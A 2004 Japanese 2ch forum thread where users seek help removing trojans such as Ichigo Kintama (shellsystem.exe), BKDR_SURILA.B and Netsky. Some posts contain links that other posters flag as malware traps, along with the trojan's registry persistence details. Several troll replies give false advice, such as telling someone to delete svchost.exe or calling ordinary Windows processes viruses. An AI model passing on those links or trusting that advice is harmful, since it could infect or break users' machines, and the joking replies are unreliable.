ウィルス情報＆質問　総合スレッド☆Part24

感染するとデスクトップの絵をうｐロダにあげて、
それへのリンクを 2ch の特定スレに自動書き込みするウィルスはやってる？

やられているスレ
角二　【うｐろだ】アップローダー案内所11【アプロダ】
http://idol.bbspink.com/test/read.cgi/ascii2d/1095176627/

>>411
エロ多すぎ

エロサイトを見た(ry
全部書くのﾏﾝﾄﾞｸｾ

>>411
新スレ立ったなぁ。

エロサイト見たら…助けて下さい！Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/l50

テンプレよく読んで実行して、それでもわからなかったら質問汁。

>>413-414
ありがとうございました。見てみます

書いてあるとおりに試してみました。
ダイヤラーなどは出なくなったのですが、
ホーム設定だけは何度やっても
ＩＥ再起動すると同じサイトになってしまいます。
どなたかお助けください、、、

どなたか情報をお願いします。

>>412

馬鹿なことしてW32/Bereb-Bというウイルスに感染してしまったんですが
ノートンの体験版で修復しようとしても　このファイルを修復できません　ファイルへのアクセスが拒否されました　と表示されて
何もできないんですがどうすればいいですか？

>>415
CWShredderでぐぐれ

>>418
起動FDから立ち上げてDOSコマンドで消す

>>416
何をどこまでやったのか書かんと、わからんよ。
あと、質問汁と言ったのは向こうのスレでって事。
今、優秀な(?)質問者がいて、回答者が気分よくなってる
ところだから、テンプレもロクにやらんで質問しても叩かれる
だけだとは思うが・・・。

>>418
ノートンで検出されたワーム名で、シマンテックのサイトで手動駆除方法を検索してみ。
レジストリとかいじられてるかもわからんし。

>>396
亀レスだけど一応
少なくともgdiplus.dllの脆弱性(MS04-028)をついたものではない

１）JPEG中に問題を引き起こすバイトシーケンスがない
２）問題のあるJPEGを検出したVB2004でスキャンしても何も検出されない

他のウィルス対策ソフトでスキャンしても特に異常はないし
そもそもサイズからいって悪質なネタと考えるべき

参考
ttp://lists.netsys.com/pipermail/full-disclosure/2004-September/026454.html

あるアプリを実行したら壁紙を変えられてしまったのですがどうすれば直せるのでしょうか？

失意登？失意昇？

今日はZoneAlerm先生がやけに反応するんですが、なにか新しいワームでも流行ってるんですか？
NetBios、Port135、Port1433、Port445あたりが攻撃されるんですが。

>>424
>>86の質問テンプレ使ってくれ。
あと、もしwinnyで落としたアプリなら板違い。

>>424
メモ帳で空白のファイルを作成してそのウイルスの実態に上書き保存→削除
ってどうかな？無理だったらｽﾏｿ

>>424
ny関連はお引き取りください

>>424
>>7

>>424
通報しました

>>412


169 ：名無したん(;´Д｀)ﾊｧﾊｧ ：04/09/22 21:39:41 ID:LP+Ly6X1
23 ：名無しさん＠ｺﾞｰｺﾞｰｺﾞｰｺﾞｰ！ ：04/09/22 21:37:54 ID:kcrfEebX
実行結果：

追加されるファイル：
windows\shellsystem.exe 678kB

追加されるレジストリ：
HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'

何か苺は甘いでウイルスが流行っているんですか？
ttp://up.isp.2ch.net/upload/c=03okari/index.cgi

私は苺で違法ダウンロードばかりしている犯罪者です
http://news13.2ch.net/test/read.cgi/news/1095854900/
【洒落】キンタマウィルスのWeb版
http://news13.2ch.net/test/read.cgi/news/1095858175/

【使用OS】 WindowsXP Home
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 Norton Antivirus
【ちゃんとUpdateしてるか】 してるみたい
【スキャンした結果（ウイルス名・発見場所）】 W32.HLLW.Rircなど
C:\DOCUMENTS AND SETTINGS\ALL USERS\の中
【別のオンラインスキャンしたならその結果は】
スキャンすると感染が見つからなかったor別のウイルスの名前が出る
【症状を具体的に、分かる限りすべて書く】
いきなりNortonのダイアログが出て「ウイルスを検出しました」と出る
またその時どんなウイルスでも必ず「ファイルを修復できません」「ファイルへのアクセスが拒否されました」となる
また最近IEの画面が出にくくなった
【何をしたらそんなことになったのか】 普通に常時接続で
【これまでにとった措置】
【その他の質問】
これは感染しているのか、単なる2ch上でウイルスコードを書くだけのいたずらなのか

>435
ttp://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.rirc.html
まずはここのremoval instructions以降を見て対処

そんでもっかい全ファイルのスキャンをやってみれ

529 名前：ＡＡ略 ◆.AwAwARK.Y [sage] 投稿日：04/09/22 21:00:08 ID:???
２ちゃんのあるスレでデスクトップの画像をキャプされてうｐろだに自動うｐ→スレに書き込みが
されるexeが出てきたね。

zipなりを解凍して(写真集) (ロリータ)〜みたいなフォルダ（実際にはフォルダのアイコンのexe）
がでてきたらご注意を
535 名前：　〜ヽ　　　　ノ ◆25P/xaaPnk [sage] 投稿日：04/09/22 21:36:20 ID:???
exe３つの奴って、軽いきんたまって感じですね。
Regedit開ける知識があれば大した事はないですけど。

536 名前：名無しさん？[sage] 投稿日：04/09/22 21:43:38 ID:???
本スレ721危険
エディタで見たら“This program must be run under Win32”って文字列あり

“アイコン”は、フォルダだけど「フォルダオプション」→表示→すべてのファイルとフォルダ
にチェックマーク入っていないと.exeの拡張子が見えない。

要するに、かっこうは、フォルダだけど、実際は、ぁゃιぃexe
まぁ踏むのは（踏んだのは）自己責任だけど、気を付けて･･･3個ともに！

537 名前：名無しさん？[sage] 投稿日：04/09/22 22:13:46 ID:???
「苺きんたま」だそうです（ｗ

ゲームとかをしてると突然電源が落ちるのですが、一体どうなっているんでしょうか？
友人に聴いてもお手上げ状態です。

心当たりは
//with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg
このファイルを踏んだらウインドが閉じれなくなり、
何かをインストールする画面も消せなかったので強制終了させました。

>>438
>>86

【使用OS、WindowsUpdateの有無】XP HOME
【使用AntiVirus、Updateの有無】ウイルスバスター　している
【スキャンした結果（ウイルス名・発見場所）】異状なし
【症状】ゲームとかをしてると突然電源が落ちます。
サイトなどを見ている分には電源は落ちません。

心当たりは
//with2ch.net/cgi-bin/eat/img-box/img20040825044933.jpg
このファイルを踏んだらウインドが閉じれなくなり、
何かをインストールする画面も消せなかったので強制終了させました。
【これまでにとった措置】AD-awareとウイルスバスターのスキャン

>>7
壁紙が蓮になるウィルスって嫌だな（ｗ

>>440
最悪ウィルス・スパイウェアてんこ盛りな悪寒

まずここ行って　熟読してHackerDefenderが入れられた無いか確かめろ。
ttp://higaitaisaku.web.infoseek.co.jp/removehacdef.html

そのうえでもう一度、ウイルス、スパイウェアのスキャン汁
（Aｄ-awareだけじゃなくSpybotも入れといた方がイイ）

それと>>438のアドは危険、絶対踏むな。
（ｊｐｇに偽装したｈｔｍｌファイル）

そういや「shellsystem.exeが接続しようとしているんですけど、これって何？」とか
質問していた奴がこの板にいたような。

あれ新種のきんたまウイルスだったのか。

苺はウィルスとは言えないなぁ。分類するならトロイだな。

これウィルスチェックで検出されるの？ノートンとかVB2004とかで。

>>445
まだ対応されてない

ｎｙじゃないがDL板逝きだな

さっきいきなりクイック起動のアイコン全てとmydocumentの中身全てと
デスクトップのよく使うアイコンが消えたんですが
これってトロイか何かでしょうか？

2chを潰すためのウイルス。
面白そうだな。

http://news18.2ch.net/test/read.cgi/mnewsplus/1095858867/951
http://news18.2ch.net/test/read.cgi/mnewsplus/1095858867/976-978

このレスを見て疑問に思ったんですがzipファイルを解凍しただけで
ウイルスに感染する、あるいはＰＣがおかしくなるなんてあるんでしょうか？

すいません。自己解決しました。
http://internet.watch.impress.co.jp/cda/special/2004/08/19/4290.html
この記事読む限りどうやらあるようですね。勉強不足でした。

すみません、質問させてもらいます。

ウイルスチェックしたところ、
secure.htmlにJS_STARTPAG.AD感染、
secure32.txtにJS_STARTPAG.AD感染、
toolbar.exeにTROJ_SMALL.AJ感染してました。

対応を見たところ、検出されたファイルは削除してしまって良いと書いてありますが、
削除してしまったらやばそうな感じがします。secure32.txtはsystem32に置いてありますし。

これって削除してしまって良いのでしょうか？

またエロか

>>452
さっさと削除しろ。

苺金玉に感染したか否かを調べる方法を教えて下さい。
昨日の夜中に、金玉アドレスを踏んだような、踏んでないような。
JAVAONで、HTMLなら、自らEXEを実行してなくても、勝手に実行している可能性ってあるんですよね？

>>454

レスありがとうございます。
友人に少し聞いてみたところ、Windowsが起動しなくなると言っていましたが、
信じていいんですね？

>>456
じゃあ、友達を信じればいいじゃん
友達はwindowsに詳しいんだろ？

>>455
shellsystem.exeでＨＤＤ内を検索しろ。
ｅｘｅを実行しなければ今の所は大丈夫だとは思うが。

苺金玉はＤＬ板行けば感染した場合での削除方法が上がってるので、今後はそちらで。

windowsフォルダ内に
$NtUninstallQ｛何かの数字が入ってる｝$
というフォルダがいくつもあるんですが
これはウィルスですか？
あともう一つ
windowsフォルダ内にtwain_32　というフォルダがあるんですが、
ウィルスですか？
教えてください。お願いします。

BKDR_SURILA.Bってトロイってのに感染したみたいなんだけど
これってどうやって駆除したらいいんですか？
ウイルスバスターで隔離はしてるんだけど。
OSはXPです

hot_mailに差出人、件名など空白のメールで
ウィルスらしき添付ファイルがあり消そうと思って
チェックボックスにチェックを入れると、他の関係ないメールにまで
全てチェックが入ってしまい消すことができません。
仕方なく別のフォルダに他のメールを移動させてその添付メールだけにして
消そうと思ったら、「このフォルダにはメッセージがありません。」となってて
メールとして認識されてないようなんですがこのメールを消すにはどうしたらいいのでしょうか？

>459
ウイルスかと疑うならウイルスチェックしてください
アンチウイルスソフトをもってなければオンラインスキャンでもどうぞ

>460
まずは>85-86をどうぞ

>>461
2階の窓から放り投げれば消える

>>463
なんてこと言うんだ。>>461さんがかわいそうじゃないか。
この場合はあれだ。HDDフォーマットだ。うん、これだ。

ウィルスソフトで修復できないウィルスってありますか？

ウイルスソフトじゃなぁ

http://gb.bbs.ws/book.php?book=gall1
これ踏んでしまったのですが、感染してるか確認するにはどうすればいいのですか？
スタートアップみても特に追加されてなかったので・・
環境はWinXpでブラウザはIE6（sp2なし）です
アップデートはSP2以外入れてあります

>467
地雷サイトに直リンすんな！
これ踏んで被害者が出たらどうすんだ

アンチウイルスソフト入れてなければ
TrendmicroでもSymantecでもMcAfeeでもいいから
サイト行ってオンラインスキャンして来い

>>465
BCG

>>467
氏ね！

うっせーばか

苺　き　ん　た　ま
http://pc5.2ch.net/test/read.cgi/sec/1095928547/

>>473
市ね

473 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：04/09/23 21:21:37
>>473
市ね

473 名前：名無しさん＠お腹いっぱい。 投稿日：04/09/23 21:21:37
>>473
市ね

【使用OS】 WindowsXP Home
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 ウィルスバスター2004
【Updateしてるか】 はい
【ウイルス名】 BKDR AGENT.K (SYSTEM32内の.dllファイルで発見）
【症状を具体的に、分かる限りすべて書く】
その.dllファイルにマウスカーソルをあてて選択状態にした時と、
Internet　Explorerを起動した時にウィルス発見のメッセージが出る。
しかも『隔離できませんでした』と。
【何をしたらそんなことになったのか】
普通に常時接続で
【これまでにとった措置】
その.dllファイルを削除しようとしてもエラーメッセージが出て失敗。

こんな状態なんですが、どうしたら削除できますかね？

>>476
まったく同じ症状です
うｐでーとしたら感染しますた・・・orz

>>479
市ね

なんで死ななきゃいけないの？

>>481
市ぬ

【使用OS】 WindowsXP Home

【WindowsUpdateしてるか】 してません

【AntiVirusは何を使っているか】 ノートン2004

【Updateしてるか】 してません

【ウイルス名】 Unix.Penguin こんなんが次々と

【症状を具体的に、分かる限りすべて書く】
ブラウザのホームページが
http://213.159.117.134/index.php
になっていました。インターネットオプションで設定変えようとしても
こっちのほうが便利だというような英語のウィンドウがでて変更できません。
２ちゃん見たりは普通にできます。

【何をしたらそんなことになったのか】
愚息がエロサイト拝見しておりました

【これまでにとった措置】
スキャンしたりいまさらウィンドウズアップデイトしたりしましたが
状況は変わりません。

識者の方ご指導お願いします。

みなさんの知恵を貸してください。
調べることは調べたのですが、対抗策がいっこうに見つからないのです。

ＯＳ：２０００
症状：とあるゲーム（居昇殿？）の最中急に重くなり、
　　　次からそのゲームを立ち上げるたびにウィルスバスター２００４から
　　　名BKDR_SURILA.B　場所C:\WINDOWS\system32\SVKP.sys
　　　のウィルス隔離の表示が出ます。
推測：ゲームからとか、ゲーム内に規制したのではなく、画面を変更？するときに
　　　活動してるのかなー

やったこと：これが間違った。レジストリーをいじってしまいました。
　　　　　　調べに調べたが同名のウイルスの情報が見つからず、
　　　　　　丸１日使ってとうとう、軽はずみに
　　　　　　えーい！怪しいのは全部削除だ！！としてしまい
　　　　　　ウイルスは残ったままで、ワード、エクセル、メール送信
　　　　　　ができなくなってしまった。私はおおうつけです。
　　　　　　オフィスのＣＤも受け付けてくれない．．．．

皆さんに助けてほしいこと：私の失敗で動かなくなったものは自己責任
　　　　　　　　　　　　　しかし、この　BKDR_SURILA.B　とやらの
　　　　　　　　　　　　　正体と対策を教えていただきたい。

　お願いします。

>>482
大ジョブだ、気にスンナ

>>482
知りたい事はBKDR_SURILA.Bの正体と対策で
ワード、エクセル、メール送信を出来るようにはしたくないのか…

>>481
えーとですね、その使用環境だとウイルスやワームやトロイや
スパイウエアやアドウエアやらにかなりやられてると思いますので
OS再インストールした方が手っ取り早いと、私は思います。

>>482
最新パターンファイルに乗ってるぐらい新しい奴だから解説もなし。
解説できるまでﾏﾀｰﾘ待っとけ。

hot_mailに差出人、件名など空白のメールで
ウィルスらしき添付ファイルがあり消そうと思って
チェックボックスにチェックを入れると、他の関係ないメールにまで
全てチェックが入ってしまい消すことができません。
仕方なく別のフォルダに他のメールを移動させてその添付メールだけにして
消そうと思ったら、「このフォルダにはメッセージがありません。」となってて
メールとして認識されてないようなんですがこのメールを消すにはどうしたらいいのでしょうか？

>>482
駆除はざっくり逝ってpandaのオンラインスキャン、
hostファイル＆レジストリ掃除
烏賊サイトに書いてあるからじっくり読む
（当然性質も書いてある）

ttp://www.pandasoftware.com/virus_info/encyclopedia/overview.aspx?lst=vis&idvirus=51005
ttp://www.sophos.com/virusinfo/analyses/w32surilab.html
英語読めないなら翻訳サイト経由で読む

>>486
基本的にHotmailにはウィルスは来ないんだよねむ

すんません、教えていただきたいです。
自分はサイトが作れる程度のHTMLしか知らん、Win2000を使っている者です。

最近ウィルスに感染してｳｨﾙｽﾊﾞｽﾀｰで一応駆除したのですが、
キンタマに感染してたのかどうか不安です。
苺キンタマなどのウィルスに感染していない通常のとき、
タスクマネージャーのプロセスにexeファイルが表示されることはあるんでしょうか？

今表示されているexeは下です。
SMSS.EXE　　　　　CSRSS.EXE　　　　WINLOGON.EXE　　　LSASS.EXE
svchost.exe　　　spoolsv.exe　　　　Ctsvccda.exe　　　svchost.exe
regsvc.exe　　　　mstask.exe　　　　WinMgmt.exe　　　　mspmspsv.exe
svchost.exe　　　tmproxy.exe　　　　imejpmgr.exe　　　　svchost.exe
realsched.exe　　　explorer.exe　　　NewsUpd.exe　　　internat.exe
BsCLiP.exe　　　　OSA.EXE　　　　　　PCCPFW.exe　　　　conime.exe
YPagerJ.exe　　　Tmntsrv.exe　　　　PCClient.exe　　　pccguide.exe
TMOAgent.exe　　　IEXPLORE.EXE　　　TASKMGR.EXE

>>489
SMSS.EXE　　　　　CSRSS.EXE　　　　WINLOGON.EXE　　　LSASS.EXE
svchost.exe　　　spoolsv.exe　　　　Ctsvccda.exe　　　svchost.exe
regsvc.exe　　　　mstask.exe　　　　WinMgmt.exe　　　　mspmspsv.exe
svchost.exe　　　tmproxy.exe　　　　imejpmgr.exe　　　　svchost.exe
realsched.exe　　　explorer.exe　　　NewsUpd.exe　　　internat.exe
BsCLiP.exe　　　　OSA.EXE　　　　　　PCCPFW.exe　　　　conime.exe
YPagerJ.exe　　　Tmntsrv.exe　　　　PCClient.exe　　　pccguide.exe
TMOAgent.exe　　　IEXPLORE.EXE　　　TASKMGR.EXE

残念ながら全てウィルスです

>>489
ここにタスクリストがある。英語だけど大体の意味は辞書引きながら
わかるはず。

ttp://www.answersthatwork.com/Tasklist_pages/tasklist.htm

ログリスト
"時刻","検索の種類","種類","ウイルス名","感染元","ウイルス検出時の処理","ウイルス駆除できない場合の処理"
"00:18","受信メール検索","e-mail","HTML_Netsky.P","Mail Delivery System <[email protected]> ""Mail delivery failed: returning message to sender""","ウイルス駆除 できません","削除 できません"
"00:18","受信メール検索","e-mail","WORM_NETSKY.P","Mail Delivery System <[email protected]> ""Mail delivery failed: returning message to sender""","ウイルス駆除 できません","削除 できません"

この２個のメール受信後メール送るたびに添え付けFILEが自動添付されるようになり
困ってます、、

この場合の対処法ご存知の方ご教授おねがいします。

>>490-491
ありがとうございます。やはりウィルスですか…
ちなみにこれは通常のウィルスかキンタマ系ウィルスかわかるでしょうか？

>>493
違う違う。俺が貼ったサイトは通常、普通にあるタスクの一覧。
他にアプリ入れてたら、載ってないのもあるし。

ちょっと祭り会場にいきたいんで、んじゃﾉｼ

>493
これで解らないのがあったら>491さんので・・・と参考までに
ttp://www003.upp.so-net.ne.jp/shigeri/speedup/speedup1.html
ttp://homepage2.nifty.com/tomokatsu/tech07.html

>493
載ってなくてウイルスかどうかを判断するにはググるのが一番良い

ウィルスに感染してる時に
自分のデスクトップにある画像やらをCD-RWに保存した場合、何か問題はありますか？

>>485
ありがとうございます。
以後気をつけます。

>497
何らかの形で実行しなければ問題ない

>>498
【総合】スパイウェア予防駆除 Part4
http://pc5.2ch.net/test/read.cgi/sec/1089126024/

すいません、>>482と同じウイルスにかかったことがトレンドマイクロのオンラインスキャンで分かったのですが・・・
ゲーム中、急にブルースクリーンになって、スキャンしてみたんですが、なにをしているウイルスなのか説明が無くとても不安なんです。
調べてみても、バックドアを作られてコンピュータの情報が見られてしまうくらいしかわかりませんでした。
そしてpandaのオンラインスキャンで駆除を試みたのですが、こちらでは検出されませんでした。

このウイルスはどのようにして削除すればよいのでしょうか？
また、放っておくとどうなってしまうのでしょう？

ウィルスバスターが「ウィルスに感染したので自動修復しました」
ってなったんですけど、ウィルス名「DEADLINK」ってどんなやつでしょうか？

トレンドマイクロのデータベースで調べてもでてこないので・・・

>>502
ウイルスじゃなくて、死んでるレジストリ消すだけみたい。

ttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=DEADLINK

>>503

なるほど、ありがとうございましたm(__)m

すいません質問です
今日初めてPandaでオンラインスキャンしてたとき
avast！のスクリーンセーバーでスキャンするやつも始まって
Pandaのオンラインスキャンの始めにダウソされるファイルに
Win32:Kuang2が検出されたのですがこれは大丈夫でしょうか？
調べたらバックドアトロイの木馬で、スキャンの為に入れられたのかな？とおもったんですが不安です。
ちなみにOSはWin98でAD-awareSEとSpybotとSpywerBlasterとOutpostが他にはいってます

名前： 名無しさん
内容：
デスノートが最終話だってさ
ttp://strawberry.web-sv.com/cgi/up/ia/up1360.zip
中身は来週のジャンプ詰め合わせだ
　　　　　　　↑
不覚にも、これexe.file(すでに404)を踏んでしまいました。
スキャンしてウィルスではなかったのはいいが、
ファイル削除したのに、 いまだに処理速度が遅いままなのです。

このexeをゴミ箱に捨てようとしたら、削除できないって出たけど、
電源入れなおしたら、削除できました。 その後、インターネットオプションで
クッキーやらファイルの削除も全部したけれども、 遅いままなのです。

エクスプローラで「exe」を検索して確答したものがあったんで、
一つ消したけど、遅いまま。「prefetch」とか書かれてたような。
もう削除してよく覚えてないけど。 根源は絶ったのですが、
それに付随するファイル等がどれなのか分かりません。
それらのファイルが処理を遅くしているはずなのですが、
その探し方が分かりません。　＿|￣|○

誰か元に戻すやり方を知りませんか？
ちなみにOSはXPです。

>>506
それデスクトップ画像とかうｐロダに晒されてるみたいだよ
キンタマだね。どっかに皿仕上げスレあるから。
ちなみに削除の仕方はｼﾗﾈ
セーフモードでもやってみれば？

>>506
遅い＝ＣＰＵ使ってる
遅い＝ＨＤ読んでる

どっち？

>>506
すいません。ageてしまいました。

処理の遅さについてですが、ブラウザ、
ワード、エクセルなど、立ち上げる際の
速度が異常に遅くなりました。

警告マークで「shellsystem リストのインデックスが
範囲を超えています(0)」としばしば表示されます。

>509
タスクマネージャーは？

>>508さん
すいません、どういう意味でしょうか？

その時はlive2chを使っていて、スレから直接ダウンロードしました。
自業自得なんですが、ファイルの安全を確認する前に
解凍してしまいました(デスクトップに表示された)。

>>509
いやＨＤずっと読んでいるかとか
Crtl+Alt+Deleteキーでタスクマネージャー出して
パフォーマンスでＣＰＵの１００％？

１００％ならプロセスでＣＰＵ食ってるプロセス探してみ

>505
こんなのみっけた

57 ：51 ：04/06/23 00:13 ID:???
>>54
その通りでした・・・＿|￣|○
PandaのインターネットセキュリティをＤＬしていたら
Ｗｉｎ３２：Ｋｕａｎｇ２っていうやつとＷｉｎ９５：Ｍａｔｙａｓ
というのも一緒にもらっていました。アンチウィルス
ソフトをＤＬして、ウィルスも一緒につけてくれるとは
なんて親切な企業なんだ。感動した！！

>>512
タスクマネージャーの存在自体知りませんでした。
今見たら、CPUが100％になっていました。

プロセスを見たんですが、どれを削っていいのか
分かりません。shellsystem.exeやOmgtray.exe.や
QCONSVC.EXEやsvchost.exeなどまったく身に覚えのないやつは
削除しても何の悪影響はでませんか？

RegCleaner（レジストリを整理するソフト）を使って、
特定のレジストリを消去しようとすると、物理、仮想メモリ、共に満タンになってしまいます。
これはウイルスなのでしょうか？アンチウイルスソフトで引っかかりませんでしたし、
WindowsUpdateも先日済ませたばかりです。
それと、この件に関係するとは思うのですが、MP3エンコーダーの処理速度が落ちましたし、
MP3タグ管理ソフトで、一括でタグ情報を変更しようとすると、これまた前よりも時間が掛かるようになりました。
一体何が原因なのでしょうか？

>>514
svchost.exeはすぐ消すべし

>>516
嘘付くなよ
消したら動かなくなるはず

>>514
その中で特にＣＰＵ食ってるプロセスはどれ？
イメージ名｜ユーザー名｜ＣＰＵ｜
って描いてるところのＣＰＵをクリックするとソートされるから

svchost関連のウイルスは有るけどそれに感染してる事は無いかもしれないし
消す必要が無い、消してもＰＣが動かなくなる事は無いがネットするのにに何らかの支障が出る

≫５１７
パソコンが動かなくなりました　携帯から書き込んでます
たすけてください

（ ´,_ゝ｀）

>>516さん
どのexeファイルが危険なのか、どうやって判断するのでしょうか？
どこかサイトを参照してますか？他にも

SPTISRV.exe、shellsystem、Omgtray、WinCinemaMgr
svchost、QCONSVC、ctfmon、mdn、avgserv、LEXPPS
spoolsv、avgcc32、rnathchk、qttask、ibmpmsvc
Isass、services、winlogon、csrss、smss、tp4serv
igfxtray、LTSMMSG、alg、hkcmd、realsched

不明なファイルがずらりと。どれ削っていいのでしょう？
すいません、何も分からなくて。

>>522
全部ぐぐって見れば？

>>518さん
容量多い順に並べると、
iexplore.exe(24,298K)＞live2ch(24,780)＞svchost(22,624)
＞explore(21,376)＞Omgtray(11,836)＞shellsystem(7,356)
＞csrss(7,208)＞以下略

こんな感じです。

>>524
ここ読んでみな
http://www.geocities.jp/ichigo_kintama/

うほっ
>513さんサンクス
俺も感動したよ、ほかのPandaでスキャンした人はどうしてるんですか？

>522
しかしうちには入ってないものはずらりと並んでるな
ctfmonはhttp://pasokoma.jp/bbs4/pslg17330.html

>>524
ＣＰＵ使ってるパーセンテージの事で容量ではないよ
ＣＰＵが常時１００％ならどれかのプロセスが異常にＣＰＵ使ってるから
まずそれを見つけること

把握できないぐらいプロセス多くて迷うならＯＳ再ｲﾝｽｺした方がいいよ
これからアプリを一つｲﾝｽｺする度にタスク（増えたプロセス）確認してチェックしとけばいい
不具合あったときにほぼ即解決できるし

ソートしろよ

shellsystemを消したら、速度が戻ったんですが、
再起動したら、復活してました。＿|￣|○

タスクマネージャーからまた削除しようとしたのですが、
今度は削除できなくなりました。

OSインストールしなおしたら、いらないもの全部消えますか？

>531
hai

>>528さん
CPU食ってるのは、shellsysytemとかいうやつでです。
2つあるんですが、2つあわせて100近くになってます。

osはユニクスですか・・・？

XPの「システムの復元」をやってみたんですが、
未完了と出て、失敗しました。

どうやったら、shellsystemを消すことが出来るでしょうか？

>>460と同じウィルスにかかりました。BKDR_SURILA.Bってやつです
トレンドマイクロのオンラインスキャンで、感染ファイルを3箇所発見したんですが
どこのデータベースにも載っておらず、駆除方法がよくわかりません。
感染していたファイル名でググったら、
Win-Trojan/MyDoom.234496っていうワームの解説が見つかって、そこにあった
Windows システムフォルダ SVKP.sys (2,368 バイト)
というのが一致したのですが、これも該当するデータベースがほとんどありませんでした…
紹介されていたページのセキュリティソフトを購入すれば大丈夫なのでしょうけども（2社しかありませんでしたが…）、
手動駆除はできるんでしょうか？

ここみぃ

ttp://planet-d.hp.infoseek.co.jp/matome/2004/ichigokintama.html

すみません、検索したはずだったのに>>482を見落としてました…
手動だけでは難しいみたいですね、失礼しました。

やっとshellsystem消えてくれました。
手動で消したんですが、今回は復活しませんでした。
また復活しそうで怖い。

でも、まだよく分からないexeファイルがいっぱいあるので、
CD見つかり次第、OSを再インスト−ルし直します。

とりあえず機能が戻ったんで、ちょっと嬉しいです。
助言くれた方に再度感謝します。

http://www.geocities.jp/ichigo_kintama/
こっちも見とけ

482のBKDR_SURILA.Bの持ち主です。みなさん、いろいろ情報
ありがとうございます。
>>460さん　
見落として同じ事を聞いていました。すみません。
>>483さん
仕事でＰＣ使うので死活問題。気にします。
>>484さん
　いえ、そりゃ全部直したいですよ。でも方法はどこ壊れたか、
　ここで聞けないから、まずウイルスのこと教えてくださいと
　しました。
>>485さん
　そうですね。それがベストだった気がします。あと１週間も
　すればウイルスバスターも動いてくれるかな？
>>487さん
　　ありがとうございます。今もてる最高の情報でした。しか
　しホストファイルは探し出せませんでした。オンラインはO
　UTLOOK使ってくれということで最後までしてません。
>>その他の私と同じウイルスの持ち主さん、
　忍耐？で、がんばりましょうね。

取りあえず、BKDR_SURILA.B　は最新パターンで取り扱ってい
るのも外国の数社で、対抗策は見えず、わかりやすい日本版を
待つのがベターかと判断しました。
　私は自分の壊してしまったところを修復していくのを優先す
ることにします。

【使用OS、WindowsUpdateの有無】Win2k,月に一回程度
【使用AntiVirus、Updateの有無】AVG,Norton体験版
【スキャンした結果（ウイルス名・発見場所）】なし
【症状】ネットワークが全く機能しない。同じネットワークのマシンすら見えない。
Z*******.tmpという実に怪しいファイルがtempフォルダに毎回起動時に生成される。*は毎回異なる。
【これまでにとった措置】spybot,ad-aware,AVG,Norton（Nortonは怪しいと思った瞬間にインスコしました）によるチェック済み。

おそらくなんかのトロイを食らっているような気がするのですが、
スキャンしても何も出てこないのが・・。
同じLANのなかの別のマシンからはこうして2chにも接続できるので、単なるLANの不良ではなさぽ。
ちなみに怪しい.tmpのファイルは「使用中の可能性が〜」とのことで削除もウイルスチェックもさせてもらえません。
どうかお知恵をお貸しください。

ちなみに、ZoneAlarmのログを見ると、なんだかえらい頻度で通信をブロックしているようです。
今はネットワークそのものを無効にしているので何もありませんが・・。

>>542-543
AVGとNorton体験版を同時に入れちゃだめ、Nortonはアンインストールしろ
他のソフトで並行してスキャンしたい時は、オンラインスキャンを使うべし
トロイを疑うのなら、アンチトロイソフトでも入れてスキャンしてみろ
【フリー版】トロイ対策 a scuared 2【あり】
http://pc5.2ch.net/test/read.cgi/sec/1077204396/

セーフモードでウィルススキャンすれば、「使用中の可能性が〜」のものは駆除できる

【使用OS、WindowsUpdateの有無】Win2k,月に一回程度
Windows2000なら、自動的に「重要な更新」をダウンロードしてインストールする設定にできるはず
WindowsUpdateはくまなくやって、その設定をしておけ。月に１回じゃ少なすぎ

苺キンタマに引っかかった奴って炉愛好者なんでしょ？

>>542
ZA入れてからちゃんとできてた？
ZAが邪魔しているということはありえませんか？
そうすれば頻繁に通信をブロックしているということも説明できる。
んでそのファイルがブロックのログということは？

すいません、メールを送ってないのにノートンにメールが送れませんでしたと出てくるのですが・・・
アドレスはいつも一緒の所に送られているようで・・・

>>541
VB2004で隔離した（検出した）ファイルはsvkp.sys以外にも
あるんでないの？
(たとえば、dx32cxlp.exe/dx32cxel.sys/dx32cxconf.ini)

SURILA.Bは別ワームMydoom.ほげほげがダウンするものらしい
そしてMydoom.ほげほげは亜種がたくさんあって、チミの情報
だけじゃ絞り込めぬ。
(pandaにもその旨書いてあるんだが本当に対応しきれてるのか
が疑問に思えてきた)

上の情報があれば絞り込みができるかもしれない。
(回答できるとしても早くて夜以降になるけど)
隔離してるからほおっておいても実害はないと思うけど気になるなら
書いてみるとよろし。

ちなみにhostsファイル(hostはtypo)は
95/98/ME： C:\Windows\System フォルダ
NT/2000： C:\WinNT\System32\Drivers\ETC フォルダ,
XP： C:\Windows\System32\Drivers\ETC フォルダ
でメモ帳なんかで確認できる
でふぉではエントリとしてコメント行(#で始まる)以外に
127.0.0.1 localhost
がある
このファイルだけなおしても意味ないけどね

手動削除手順は以下のような感じになると思う(スペイン語)
ttp://www.softdownload.org/fichas/masbuscados/virusreport/guias_de_seguridad/trojsurila.naa.2._3166.asp

Return-Path: <[email protected]>
Received:from ttb2-ip008.user.xsp.fenics.jp (EHLO yahoo.co.jp) (219.97.237.8)
by **
From: [email protected]
To: **
Subject: Thank you!
Date: **
MIME-Version:1.0 Content-Type:multipart/mixed;
X-Priority:3 X-MSMail-Priority:Normal

Your bill is attached to this mail.

ファイル名： bill.zip
ファイルの種類： application/octet-stream
スキャン結果： W32.Netsky.P@mmというウイルスが見つかりました。

http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
より、
差出人:[email protected]
件名:
Congratulations!
Thank you!

本文:
You were registered to the pay system.
For more details see the attachment.

Your bill is attached to this mail.

W32.Netsky.P@mm!enc に感染しているファイルが検出された場合、
そのファイルには、MIME 形式でエンコードされたW32.Netsky.P@mm ワーム
が含まれています。
http://www.symantec.com/region/jp/sarcj/data/w/w32.netsky.p@mm!enc.html

末尾に.encが付いた検出名が通知される場合の対処方法
http://www.symantec.com/region/jp/sarcj/data/e/enc.detection.html

542です。出先からなので今すぐというわけにいきませんが、
自宅に帰ったら試してみたいと思います。よろしくお願いいたします。
結果は後ほど報告させていただきます。

>>544氏
